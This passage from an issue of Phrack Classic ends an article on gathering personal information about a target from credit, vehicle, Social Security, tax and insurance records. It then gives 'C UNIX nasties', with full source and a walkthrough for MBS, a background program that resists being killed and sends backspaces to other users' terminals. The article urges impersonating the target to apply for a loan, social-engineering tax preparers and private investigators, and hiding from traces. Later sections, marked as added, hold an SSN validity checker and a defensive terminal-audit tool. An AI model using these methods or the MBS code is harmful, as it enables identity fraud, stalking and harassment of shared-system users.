Post Office, Voter Registration, Former Neighbors, Former Utilities (water, gas,
electric, phone, cable, etc.)
If you know someone who works at a bank or car dealer you could have them run
a credit check which will reveal all of their credit cards and if they have
ever had any late payments or applied for any loans. If you are brave enough
you could even apply for a loan impersonating the individual under investigation.
The Credit Bureau also has Sentry Services that can provide deceased social
security numbers, postal drop box address and known fraudulent information.
You can get an individual's driving record by sending a letter to your state's
Department of Revenue, Division of Vehicles. You can also get the following:
Driver Control Bureau
For Driving Record send Name, Address, Date of Birth and usually a $1
processing fee for a 5 year record.
Titles & Registration Bureau
For ownership information (current and past).
Driver License Examination Bureau
To see what vision was rated.
Motor Carrier Inspection & Registration Bureau
To check on licensing and registration of trucks/trucking companies.
Revocation Dept
Can verify if someone's driver's license has ever been suspended or revoked.
You can even obtain a complete vehicle history by sending the vehicle
description, identification # for the last registered owner, and a small fee. Send
this info to your state's Dept of Vehicles. It is best to contact them first
to get their exact address and fees. I would advise using a money order and
a P.O. Box so they cannot trace it to you without a hassle.
Police Records
All Police and Fire Records are Public record unless the city is involved.
You can usually get everything available from the police dept including:
Interviews, maps, diagrams, misc reports, etc.
FBI Records
If the individual you are inquiring about is deceased the FBI will provide
some info if you give them Full Name, SSN, Date & Place of Birth. Contact
your local FBI office to get the details.
Real Estate Records
Recorder of Deeds offices in each county maintain land ownership records.
Most are not computerized and you have to manually search. Then you must
review microfilm/fiche for actual deeds of trust, quit claim deeds,
assignments, mortgage, liens, etc.
A title company can run an Ownership & Equity (O&E) search for a fee ($80-$100)
which will show ownership, mortgage info, easements, taxes owed, taxes
assessed, etc.
Most county assessors will provide an address and value of any real property
if you request a search by name.
Social Security Records
Social Security Administrator
Office of Central Records Operations
300 North Greene Street
Baltimore, Maryland 21201
301-965-8882
Title II and Title XVI disability claims records, info regarding total earnings
for each year, detailed earnings information show employer, total earnings, and
social security paid for each quarter by employer.
Prices are approximately as follows:
1st year of records          $15.00
2nd-5th year of records      $ 2.50 per person
6th-10th year of records     $ 2.00 per person
11th-15th year of records    $ 1.50 per person
16th-on year of records      $ 1.00 per person
** Call for verification of these prices. **
Social Security records are a great source of information when someone has
been relatively transient in their work, or if they are employed out of a
union hall.
If you want to review a claim file, direct your request to the Baltimore
office. They will send the file to the social security office in your city
for you to review and decide what you want copies of.
The first three digits of a social security number indicate the state of
application.
The Social Security Number
SSA has continually emphasized the fact that the SSN identifies a particular
record only and the Social Security Card indicates the person whose record is
identified by that number. In no way can the Social Security Card identify
the bearer. From 1946 to 1972 the legend "Not for Identification" was printed
on the face of the card. However, many people ignored the message and the
legend was eventually dropped. The social security number is the most widely
used and carefully controlled number in the country, which makes it an
attractive identifier.
With the exception of the restrictions imposed on Federal and some State and
local organizations by the Privacy Act of 1974, organizations requiring a
unique identifier for purposes of controlling their records are not prohibited
from using (with the consent of the holder) the SSN. SSA records are
confidential and knowledge of a person's SSN does not give the user access to
information in SSA files which is confidential by law.
Many commercial enterprises have used the SSN in various promotional efforts.
These uses are not authorized by SSA, but SSA has no authority to prohibit
such activities as most are not illegal. Some of these unauthorized uses are:
SSN contests; skip-tracers; sale or distribution of plastic or metal cards;
pocketbook numbers (the numbers used on sample social security cards in
wallets); misleading advertising, commercial enterprises charging fees for SSN
services; identification of personal property.
The Social Security Number (SSN) is composed of 3 parts, XXX-XX-XXXX, called
the Area, Group, and Serial. For the most part, (there are exceptions), the
Area is determined by where the individual APPLIED for the SSN (before 1972)
or RESIDED at time of application (after 1972). The areas are assigned as
follows:
000     unused      387-399 WI      528-529 UT
001-003 NH          400-407 KY      530     NV
004-007 ME          408-415 TN      531-539 WA
008-009 VT          416-424 AL      540-544 OR
010-034 MA          425-428 MS      545-573 CA
035-039 RI          429-432 AR      574     AK
040-049 CT          433-439 LA      575-576 HI
050-134 NY          440-448 OK      577-579 DC
135-158 NJ          449-467 TX      580     VI Virgin Islands
159-211 PA          468-477 MN      581-584 PR Puerto Rico
212-220 MD          478-485 IA      585     NM
221-222 DE          486-500 MO      586     PI Pacific Islands*
223-231 VA          501-502 ND      587-588 MS
232-236 WV          503-504 SD      589-595 FL
237-246 NC          505-508 NE      596-599 PR Puerto Rico
247-251 SC          509-515 KS      600-601 AZ
252-260 GA          516-517 MT      602-626 CA
261-267 FL          518-519 ID
268-302 OH          520     WY
303-317 IN          521-524 CO
318-361 IL          525     NM
362-386 MI          526-527 AZ
*Guam, American Samoa, Northern Mariana Islands, Philippine Islands
627-699 unassigned, for future use
700-728 Railroad workers through 1963, then discontinued
729-899 unassigned, for future use
900-999 not valid SSNs, but were used for program purposes
        when state aid to the aged, blind and disabled was
        converted to a federal program administered by SSA.
As the Areas assigned to a locality are exhausted, new areas from the pool are
assigned. This is why some states have non-contiguous groups of Areas.
The Group portion of the SSN has no meaning other than to determine whether or
not a number has been assigned. SSA publishes a list every month of the
highest group assigned for each SSN Area. The order of assignment for the
Groups is: odd numbers under 10, even numbers over 9, even numbers under 9
except for 00 which is never used, and odd numbers over 10. For example, if the
highest group assigned for area 999 is 72, then we know that the number
999-04-1234 is an invalid number because even Groups under 9 have not yet been
assigned.
The Serial portion of the SSN has no meaning. The Serial is not assigned in
strictly numerical order. The Serial 0000 is never assigned.
Before 1973, Social Security Cards with pre-printed numbers were issued to
each local SSA office. The numbers were assigned by the local office. In 1973,
SSN assignment was automated and outstanding stocks of pre-printed cards were
destroyed. All SSNs are now assigned by computer from headquarters. There
are rare cases in which the computer system can be forced to accept a manual
assignment such as a person refusing a number with 666 in it.
A pamphlet entitled "The Social Security Number" (Pub. No.05-10633) provides
an explanation of the SSN's structure and the method of assigning and
validating Social Security numbers.
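The Area, Group, and Serial rules described above can be turned into a
screening check that flags values which could not have been issued, for example
when reviewing submitted records for fabricated numbers. The following is an
added example, not part of the original article; the function names and the
"highest group" figures are constructed for illustration.

```python
import re

# Order in which Groups are issued within an Area, as the text describes:
# odd 01-09, then even 10-98, then even 02-08 (00 is never used),
# then odd 11-99.
GROUP_ORDER = (
    list(range(1, 10, 2))
    + list(range(10, 99, 2))
    + list(range(2, 9, 2))
    + list(range(11, 100, 2))
)
GROUP_RANK = {group: rank for rank, group in enumerate(GROUP_ORDER)}

# Area classes taken from the table in the article (1990 assignments).
AREA_CLASSES = [
    (0, 0, "unused"),
    (1, 626, "assigned"),
    (627, 699, "unassigned"),
    (700, 728, "railroad"),
    (729, 899, "unassigned"),
    (900, 999, "program-use"),
]

SSN_PATTERN = re.compile(r"(\d{3})-?(\d{2})-?(\d{4})")


def classify_area(area):
    """Return the class of a three-digit Area per the article's table."""
    for low, high, label in AREA_CLASSES:
        if low <= area <= high:
            return label
    return "unknown"


def group_issued(group, highest_group):
    """True if `group` comes at or before `highest_group` in issue order."""
    if group not in GROUP_RANK or highest_group not in GROUP_RANK:
        return False  # 00 is never used; anything else is out of range
    return GROUP_RANK[group] <= GROUP_RANK[highest_group]


def check_ssn(text, highest_groups):
    """Return reasons the value cannot be an issued SSN (empty list = none).

    `highest_groups` maps Area -> highest Group issued so far, i.e. the
    monthly list the article says SSA publishes. Areas missing from the
    mapping skip the issue-order check.
    """
    match = SSN_PATTERN.fullmatch(text.strip())
    if match is None:
        return ["malformed"]
    area, group, serial = (int(part) for part in match.groups())

    reasons = []
    area_class = classify_area(area)
    if area_class not in ("assigned", "railroad"):
        reasons.append(f"area {area:03d} is {area_class}")
    if group == 0:
        reasons.append("group 00 is never used")
    elif area in highest_groups and not group_issued(group, highest_groups[area]):
        reasons.append(f"group {group:02d} not yet issued for area {area:03d}")
    if serial == 0:
        reasons.append("serial 0000 is never assigned")
    return reasons


if __name__ == "__main__":
    # Constructed sample data: highest Group issued per Area.
    sample_highest = {212: 72, 999: 72}
    for value in ("212-09-1234", "212-04-1234", "999-04-1234", "212-10-0000"):
        print(value, check_ssn(value, sample_highest) or "passes structure checks")
```

An empty result only means the number is structurally possible; it says nothing
about whether the number belongs to the person presenting it.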
Tax Records
If you can find out who does the individual's taxes you might be able to get
copies from them with the use of creative social engineering.
If you want to run a tax lien search, there is a service called Infoquest that
will do one for a fee. Call 1-800-777-8567 with a specific request.
Post Office Records
If you have an address for someone that is not current, always consider writing
a letter to the postmaster of whatever post office branch services the zip code
of the missing person. Provide them the name and the last known address and
simply ask for the current address. There might be a $1 fee for this so it
would be wise to call first.
City Directory, Polk's, Cole's, etc.
Information in these directories is contained alphabetically by name,
geographically by street address, and numerically by telephone number, so if
you have any of those three pieces of info, a check can be done. The Polk's
directory also shows whether the person owns their home or rents, their marital
status, place of employment, and a myriad of other tidbits of information.
However, these books are not the be-all and end-all of the information as they
are subject to public and corporate response to surveys. These directories are
published on a nationwide basis so if you are looking for someone outside of
your area, simply call the public library in the area you have an interest and
they also can perform a crisscross check for you.
You can also call a service owned by Cole's called the National Look up Library
at 402-473-9717 and either give a phone number and get the name & address or
give the address and get the name and phone number. This is only available to
subscribers; a subscription costs $183.00 for 1991. A subscriber gets two free
lookups per day and every one after that costs $1.25. A subscriber can also
mail in a request for a lookup to:
National Look Up Library
901 W. Bond Street
Lincoln, NE 68521-3694
A company called Cheshunoff & Company can, for a $75 fee, obtain a 5-year
detailed financial analysis of any bank.
505 Barton Springs Road
Austin, Texas 78704
512-472-2244
Professional Credit Checker & Nationwide SSN-locate.
!Solutions! Publishing Co.
8016 Plainfield Road
Cincinnati, Ohio 45236
513-891-6145
1-800-255-6643
Top Secret Manuals
Consumertronics
2011 Crescent Drive
P.O. Drawer 537-X
Alamogordo, New Mexico 88310
505-434-0234
Federal Government Information Center is located at
1520 Market Street
St. Louis, Missouri
1-800-392-7711
U.S. Dept of Agriculture has located aerial photos of every inch of the United
States.
2222 West 2300 S.
P.O. Box 36010
Salt Lake City, Utah 84130
801-524-5856
To obtain general information regarding registered agent, principals, and good
standing status, simply call the Corporate Division of the Secretary of State
and they will provide that information over the phone. Some corporate divisions
are here:
Arkansas Corporate Division 501-371-5151
Delaware Corporate Division 302-736-3073
Georgia Corporate Division 404-656-2817
Indiana Corporate Division 317-232-6576
Kansas Corporate Division 913-296-2236
Louisiana Corporate Division 504-925-4716
Missouri Corporate Division 314-751-4936
New York Corporate Division 518-474-6200
Texas Corporate Division 512-475-3551
Freedom Of Information
The Freedom of Information Act allows the public to request information
submitted to, or generated by, all executive departments, military departments,
government or government controlled corporations, and regulatory agencies. Each
agency, as described above, publishes in the Federal Register, descriptions of
its central and field organizations and places where and how requests are to be
directed. Direct a letter to the appropriate person designated in the Federal
Register requesting reasonably described records be released to you pursuant to
the Freedom of Information Act. Be sure to follow each agency's individually
published rules which state the time, place, fees, and procedures for the
provisions of information. The agency should promptly respond.
How to Find Information About Companies, Ed. II, 1981, suggests, "Government
personnel you deal with sometimes become less helpful if you approach the
subject by threatening the Freedom of Information Act action - it's best to ask
for the material informally first." While this will probably enable you to find
the correct person to send your request to, be prepared to spend at least half
an hour on the phone talking to several people before you find the person who
can help you. The book also has a brief description of what each governmental
agency handles.
If you want to see if someone you are trying to locate is a veteran, has a
federal VA loan, or receives some sort of disability benefit, use Freedom
of Information and provide the person's SSN.
You will get a bill but you can ask for a fee waiver if this contributes to a
public understanding of the operation of the government. You can also request
an opportunity to go through the files yourself and then decide what you want
copied.
Insurance Records
PIP carrier records (may contain statements, medical records, new doctors/
hospital names, records of disability payments, adjuster's opinions,
applications for insurance coverage, other claim info, etc.)
Health insurance records (may contain medical records, record of bills, new
doctors/hospital names, pre-existing conditions information, info regarding
other accidents/injuries, etc.)
Often you will have to go through the claims office, the underwriting dept, and
the business office to get complete records as each individual dept maintains
its own separate files.
Workers Compensation
Some states will let you simply request records. Just submit your request
including the SSN and Birthdate, to the Department of Human Resources, Division
of Worker's Compensation. They will photocopy the records and send you the
copies. Other states require an authorization to obtain these records.
You can always call your local Private Investigator pretending you are a
student doing a research paper on the methods of getting personal information
about people or even trash his place to find tips on tracking down people.
I hope this PHILE helps you in one way or another, if not, maybe a future PHILE
by The Butler will...........
Till Next Time,
The Butler...
_______________________________________________________________________________
==Phrack Classic==
Volume Three, Issue 32, File #5 of 12
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
%P                                                           P%
%H                  C UNIX `nasties' PART I                  H%
%A                            by                             A%
%Z             Sir Hackalot of PHAZE (10/20/90)              Z%
%E                                                           E%
*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*%*
o Purpose of this file:
The purpose of this file is to share small C programs for the Unix
System V and/or BSD 4.3 operating systems which are, in logical terms,
"Nasty". This "Nasty" can be termed better as Annoyance programs
or tricky programs.
The purpose of this text however, is NOT to teach one how to program
in C and/or how to use the C compiler on Unix systems. This textfile
assumes you have a working knowledge of programming with C in the
UNIX environment.
o The UTMP Reader:
~~~~~~~~~~~~~~~~
First, I would like to start this text off by posting in a generic
/etc/utmp reader. The /etc/utmp reader is essential for applications
that deal with all the users online at a given time.
Here is the source:
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
/* WhatTTY -- Generic WHO
UTMP Reader "Skeleton" : By Sir Hackalot / PhaZe
This is basically a skeleton program that is just a base for any UTMP
operations.
This is the skeleton that PhaZe(soft) uses for anything that deals
with reading the utmp file, such as MBS, SEND, VW, MME, and other
utilities.
Applications: You can use this when you need to do something to
everyone online, or when you need some sort of data from utmp, wtmp
or any file that is like utmp.
*/
#include <sys/types.h>
#include <utmp.h> /* This is the key to the whole thing */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h> /* read() and close() */

int main()
{
        int handle;
        char *etc = "/etc/utmp";
        struct utmp user;

        handle = open(etc,O_RDONLY);
        if (handle < 0) { /* no utmp file at this path */
                perror(etc);
                return 1;
        }
        while(read(handle,&user,sizeof(user)) != 0) {
                if (user.ut_type == USER_PROCESS)
                        printf("%s is on %s\n",user.ut_name,user.ut_line);
        }
        close(handle);
        /* Simple, Right? */
        /* To see anything that is waiting for a login, change USER_PROCESS
           to LOGIN_PROCESS */
        return 0;
}
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
In the above program, this is what happens:
1. I assigned the variable "etc" to point at the string
"/etc/utmp", which is the utmp file.
2. I opened it in Read ONLY mode (O_RDONLY).
3. I started a loop that does not end until 0 bytes are
read into the user structure. The 0 bytes would mean
end of file.
Notice the line:
if (user.ut_type == USER_PROCESS)
What the above line does is to distinguish between a user
and a terminal waiting for a Login. The ut_type is defined
in utmp.h. There are many types. One of them is LOGIN_PROCESS.
That will be a terminal waiting for a login. If you wanted to see
all the TTYs waiting to be logged in on, you would change the
USER_PROCESS to LOGIN_PROCESS. Other types are things like
INIT_PROCESS. You can just look in utmp.h to see them.
Also notice that I have included "sys/types.h". If you do not include
this file, there will be an error in utmp.h, and other headers.
types.h has definitions for other TYPES of data, etc. So, if in
a header file you encounter a syntax error, you might need to include
sys/types.h
This program is just a skeleton, although it does print out who
is logged on, and to what TTY they are on. You will see how this
skeleton I wrote can be used. I used it to write MBS.
_______________________________________________________________________________
o MBS -- Mass BackSpace virus:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MBS may not be considered a virus, since it does not replicate
itself. However, it does "infect" every user that logs in, provided
the conditions are right.
The MBS virus uses the utmp reader to constantly read the utmp
file to find its next victim. It eventually gets everyone, then
recycles to start again, thereby catching people who log in after
it is started.
Let's look at the source:
- - - - - - - - - - - - - - - - - -CUT-HERE- - - - - - - - - - - - - - - - - -
#include <stdio.h>
#include <sys/types.h>
#include <utmp.h>
#include <fcntl.h>
#include <signal.h>
/*
MBS - Mass BackSpace Virus!! v2.2 Deluxe+
(c) 1990 - Sir Hackalot
PhaZeSOFT Ltd.
*/
char *ent[10][100]; /* This supports 10 immune people change 10 to x for more */
int maxitem = 5; /* Should be total # of immune dudes */
int truefalse = 0;
int warn[10],bad;
char full_tty[15], text[160], kstr[80];
FILE *to_tty, *strm;
struct utmp u;
void kmes(fmt,boo)
char *fmt;
int boo;
{
if (boo != 0) {
printf("MBS_KERN: ");
printf("%s",fmt);
}
if (boo == 0) {
sprintf(full_tty,"/dev/%s",u.ut_line);
to_tty = fopen(full_tty,"w");
fprintf(to_tty,"MBS_KERN: %s",fmt);
fclose(to_tty);
}
}
void initit() { /* Initialize our little "kernel" */
int xxx = 0;
strcpy(ent[0],"technic");
strcpy(ent[1],"merlin");
strcpy(ent[2],"datawiz");
strcpy(ent[3],"par");
strcpy(ent[4],"Epsilon");
while (xxx < 11) {
warn[xxx] = 0;
xxx++;
}
kmes("Kernel Started.\n",1);
}
void warnem(wcnt) /* Notify all the immune people ... */
int wcnt;
{
if (bad == 0) { /* keep from dumping core to disk */
if (warn[wcnt] < 2) {
sprintf(kstr,"%s has started a backspace virus!\n",getlogin());
kmes(kstr,0);
warn[wcnt]++;
}
}
}
int checkent(uname) /* Check for immunity */
char *uname;
{
int cnt = 0;
truefalse = 0; /* assume NOT immune */
while (cnt < maxitem) {
if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
truefalse = 1;
warn[cnt]++; /* increment warning variable */
warnem(cnt); /* warn him if we have not */
}
cnt++;
}
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}
/* Purpose: Instead of just ignoring the signal via SIG_IGN, we want
to intercept it, and notify use */
void sig_hand(sig)
int sig;
{
if(sig == 3) kmes("Ignoring Interrupt\n",1);
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
if(sig == 4) kmes("Ignoring quit signal.\n",1);
}
main(argc,argv)
int argc;
char *argv[];
{
int prio,pid,isg,handle;
char buf[80];
char name[20],tty[20],time[20];
initit();
if (argc < 2) prio = 20;
if (argc == 2) prio = atoi(argv[1]);
if ((pid = fork()) > 0) {
printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
printf("Another Fine PhaZeSOFT production\n");
printf("Thanks to The DataWizard for Testing this\n");
printf("Hello to The Conflict\n");
sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
kmes(kstr,1);
exit(0); /* KILL MOTHER PID, return to Shell & go background */
}
nice(prio);
signal(SIGQUIT,sig_hand);
signal(SIGINT,sig_hand);
signal(SIGTERM,sig_hand);
/* That makes sure you HAVE to do a -9 or -10 to kill this thing.
Sometimes, hitting control-c will kill of background processes!
Add this line if you want it to continue after you hangup:
signal(SIGHUP,SIG_IGN);
doing it will have the same effect as using NOHUP to
to execute it. Get it? Nohup = no SIGHUP
*/
while(1) { /* "Kernel" Begins here and never ends */
handle = open("/etc/utmp",O_RDONLY);
while (read(handle,&u,sizeof(u)) != 0) {
bad = 0;
sprintf(full_tty,"/dev/%s",u.ut_line);
if (strcmp(u.ut_name,getlogin()) != 0) {
/* Fix: Below is a line that optimizes the hosing/immune process
It skips the utmp entry if it is not a user. If it is, it
checks for immunity, then comes back. This is alot faster
and does not wear down cpu time/power */
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
else isg = 1;
if (isg != 1) {
if((to_tty = fopen(full_tty,"w")) == NULL) {
bad = 1;
}
if (bad == 0) {
fprintf (to_tty, "\b\b\b");
fflush (to_tty);
}
fclose(to_tty);
}
}
}
close (handle);
}
}
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
I am going to try to take this bit by bit and explain how it works
so that maybe you can come up with some good ideas on creating
something similar.
I will start with the MAIN function. Here it is:
___
main(argc,argv)
int argc;
char *argv[];
{
int prio,pid,isg,handle;
char buf[80];
char name[20],tty[20],time[20];
initit();
___
Obviously, this is the part of the code which initializes the main
variables used. The "main(argc,argv)" is there so it can accept
command line parameters. The command line parameters are just
for speed customization, which I will discuss later. Notice how
the variables are defined for the command line parameters:
int argc, char *argv[];
argc is the number of arguments, INCLUDING the name of the current
executable running. argv[] holds the strings in an array which make
up the parameters passed. argv[0] holds the name of the program,
while argv[1] holds the 1st parameter entered on the command line.
initit() is called to set up the necessary tables. All of
the variables defined at the top of the program are global, and a lot
of these functions use the global variables, as does initit().
___
if (argc < 2) prio = 20;
if (argc == 2) prio = atoi(argv[1]);
___
Ok, the above two lines essentially parse the command line.
The MBS program only accepts ONE argument, which is the priority
value to add to the normal process priority. This is so you
can customize how fast MBS runs. If you want to burn CPU time,
you would invoke mbs by:
$ mbs 0
That would make the priority as fast as the current can run something.
MBS's default priority setting is 20, so that CPU time will be saved.
MBS is very fast however, and since a lot of Unix systems like to
cache a lot of frequently used data from disks, it gets fast after
it reads utmp a few times, since utmp will be cached until it changes.
However, you can run MBS with a number from 0-19, the higher the
number, the "less" priority it will have with the cpu.
___
if ((pid = fork()) > 0) {
printf("Welcome to MBS 2.2 Deluxe, By Sir Hackalot [PHAZE]\n");
printf("Another Fine PhaZeSOFT production\n");
sprintf(kstr,"Created Process %s (%d)\n\n",argv[0],pid);
kmes(kstr,1);
exit(0); /* KILL MOTHER PID, return to Shell & go background */
}
___
The above is what sends MBS into the background. It calls fork(),
which creates another process off the old one. However, fork()
can be considered "cloning" a process, since it will use anything
beneath it. So, now you can assume there are TWO copies of MBS
running -- One in the foreground, and one in the background. However,
you may notice the exit(0). That first exit kills off the parent.
A second call to exit() would kill the child as well. Notice the
call to "kmes". kmes is just a function that is defined earlier,
which I will discuss later.
___
nice(prio);
signal(SIGQUIT,sig_hand);
signal(SIGINT,sig_hand);
signal(SIGTERM,sig_hand);
/* signal(SIGHUP,SIG_IGN); */
___
The above code is integral for the survival of the MBS program in
memory. The nice(prio) is what sets the new priority determined
by the command line parsing.
The signal() statements are basically what keep MBS running. What
they do is catch INTERRUPTS, Quits, and a regular call to KILL.
The commented-out portion would ignore requests to kill upon hangup.
This would keep MBS in the background after you logged off.
Why do this? Well, remember that the parent was affected by
its environment? Well, the new forked process is too. That means,
if you were 'cat'ting a file, and hit control-C to stop it, the
cat process would stop, but push the signal on to MBS, which would
cause MBS to exit, if it did not have a signal handler. The signal
calls setup signal handlers. What they do is tell the program
to goto the function sig_hand() when one of the 3 signals is
encountered. The commented signal just tells the program to ignore
the hangup signal. The sig_hand argument can be replaced with
SIG_IGN if you just want to plain ignore the signal and not handle it.
The SIGQUIT is sometimes the control-D character. That is why it
also must be dealt with. If the signals aren't ignored or caught,
MBS can easily be kicked out of memory by YOU, by accident of course.
___
while(1) { /* "Kernel" Begins here and never ends */
handle = open("/etc/utmp",O_RDONLY);
___
The above starts the main loop. The beginning of the loop is to open
the utmp file.
___
while (read(handle,&u,sizeof(u)) != 0) {
bad = 0;
sprintf(full_tty,"/dev/%s",u.ut_line);
if (strcmp(u.ut_name,getlogin()) != 0) {
if (u.ut_type == USER_PROCESS) isg = checkent(u.ut_name);
else isg = 1;
if (isg != 1) {
if((to_tty = fopen(full_tty,"w")) == NULL) {
bad = 1;
}
if (bad == 0) {
fprintf (to_tty, "\b\b\b");
fflush (to_tty);
}
fclose(to_tty);
}
}
___
Above is the sub_main loop. What it does is go through the utmp
file, and on each entry, it prepares a path name to the TTY
of the current utmp entry (sprintf(fulltty...)). Then it checks
to see if it is YOU. If it is, the loop ends. If it is not, then
it sees if it is a User. If not, it ends the loop and goes to
the next.
If it is a user, it goes to checkent to see if that user has been
declared immune in the immunity tables (down below later..).
If the idiot is not immune, it attempts to open their tty. If it
cannot, it sets the bad flag, then ends the loop. If it can be
written to, it sends three backspaces, according to YOUR tty specs.
Then, it closes the opened tty, and the loop continues until the end.
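Seen from the defender's side, the loop above only reaches terminals that other users are permitted to write to, and the utmp reads shown so far keep looping on a read error and treat the fixed-width utmp fields as C strings. The following added example, which is not part of the original file, is a utmp reader with those points handled that reports which logged-in sessions have such a terminal; the function names and the constructed sample records are assumptions made for the example.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
#include <utmp.h>

/* 1 if the mode lets anyone besides the owner write to the line (mesg y). */
int tty_mode_exposed(mode_t mode) { return (mode & (S_IWGRP | S_IWOTH)) != 0; }

/* Count USER_PROCESS sessions whose tty under dev_dir is writable by others.
   Returns -1 if utmp_path cannot be opened; *sessions receives the total. */
int audit_utmp(const char *utmp_path, const char *dev_dir, int *sessions)
{
    struct utmp u;
    struct stat st;
    char name[sizeof(u.ut_name) + 1], line[sizeof(u.ut_line) + 1], path[512];
    int fd, exposed = 0;
    *sessions = 0;
    if ((fd = open(utmp_path, O_RDONLY)) < 0) return -1;
    /* Stops at EOF, on a read error (-1) and on a truncated last record. */
    while (read(fd, &u, sizeof(u)) == (ssize_t)sizeof(u)) {
        if (u.ut_type != USER_PROCESS) continue;
        /* Fixed-width fields need not be NUL-terminated: bound every copy. */
        snprintf(name, sizeof(name), "%.*s", (int)sizeof(u.ut_name), u.ut_name);
        snprintf(line, sizeof(line), "%.*s", (int)sizeof(u.ut_line), u.ut_line);
        (*sessions)++;
        /* ut_line is data read from a file: keep the path inside dev_dir. */
        if (line[0] == '\0' || line[0] == '/' || strstr(line, "..")) continue;
        snprintf(path, sizeof(path), "%s/%s", dev_dir, line);
        if (stat(path, &st) == 0 && tty_mode_exposed(st.st_mode)) {
            printf("%s on %s: writable by other users\n", name, line);
            exposed++;
        }
    }
    close(fd);
    return exposed;
}

/* Constructed sample (not real data): scratch dir stands in for utmp and /dev. */
int run_constructed_sample(int *sessions)
{
    static const struct { short type; const char *user, *line; mode_t mode; } rec[] = {
        { USER_PROCESS,  "alice", "ttyA", 0620 },  /* mesg y */
        { USER_PROCESS,  "bob",   "ttyB", 0600 },  /* mesg n */
        { LOGIN_PROCESS, "LOGIN", "ttyC", 0622 },  /* nobody logged in */
    };
    char dir[] = "/tmp/utmpauditXXXXXX", path[512], upath[512];
    int fd;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(upath, sizeof(upath), "%s/utmp", dir);
    if ((fd = open(upath, O_WRONLY | O_CREAT, 0600)) < 0) return -1;
    for (size_t i = 0; i < sizeof(rec) / sizeof(rec[0]); i++) {
        struct utmp u = { .ut_type = rec[i].type };
        memcpy(u.ut_name, rec[i].user, strlen(rec[i].user));
        memcpy(u.ut_line, rec[i].line, strlen(rec[i].line));
        if (write(fd, &u, sizeof(u)) != (ssize_t)sizeof(u)) return -1;
        snprintf(path, sizeof(path), "%s/%s", dir, rec[i].line);
        close(open(path, O_WRONLY | O_CREAT, 0600));
        chmod(path, rec[i].mode);
    }
    close(fd);
    return audit_utmp(upath, dir, sessions);
}

int main(void)
{
    int total, exposed = run_constructed_sample(&total);
    return printf("%d of %d sessions exposed\n", exposed, total) < 0;
}
```

On a live system, call audit_utmp() with the real utmp path and "/dev"; a session it reports stops being writable by others once its owner runs `mesg n`.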
___
}
close (handle);
}
}
___
The above is the end of the main loop. It closes handle (utmp) so
it can be reopened at the start of the loop at the beginning of the
file. The reason to not create a table of people to hit in memory
after one reading is so that MBS will stop after people logoff, and
to start when new ones logon. The constant reading of the utmp
file makes sure everyone gets hit, except immune people. Also,
the file must be closed before reopening, or else, after a few opens,
things will go to hell.
Here is the signal handler:
___
void sig_hand(sig)
int sig;
{
if(sig == 3) kmes("Ignoring Interrupt\n",1);
if(sig == 15) kmes("Ignoring Termination Signal\n",1);
if(sig == 4) kmes("Ignoring quit signal.\n",1);
}
___
It is very simple. When a signal is caught and sent to the handler,
the library function SIGNAL sends the signal number as an argument
to the function. The ones handled here are 3,4, and 15. But
this was just for effect. You could just have it print one line
no matter what the signal was, or just rip this function out and
put in SIG_IGN in the signal calls.
Below is the immunity check:
___
int checkent(uname) /* Check for immunity */
char *uname;
{
int cnt = 0;
truefalse = 0; /* assume NOT immune */
while (cnt < maxitem) {
if (strcmp(uname,ent[cnt]) == 0) { /* if immune... */
truefalse = 1;
warn[cnt]++; /* increment warning variable */
warnem(cnt); /* warn him if we have not */
}
cnt++;
}
return(truefalse); /* return immunity stat. 1=immune, 0 = not */
}
___
Above, you see variables used that are not defined. They are
just variables that were declared as globals at the beginning.
What this does is just compare the login name sent to it with
every name in the immunity table. If it finds the name on
the table matches, it will go and see if it should warn the
user. Also, the warn count is incremented so that the warning
function will know if the user has been warned.
Here is the warning function:
___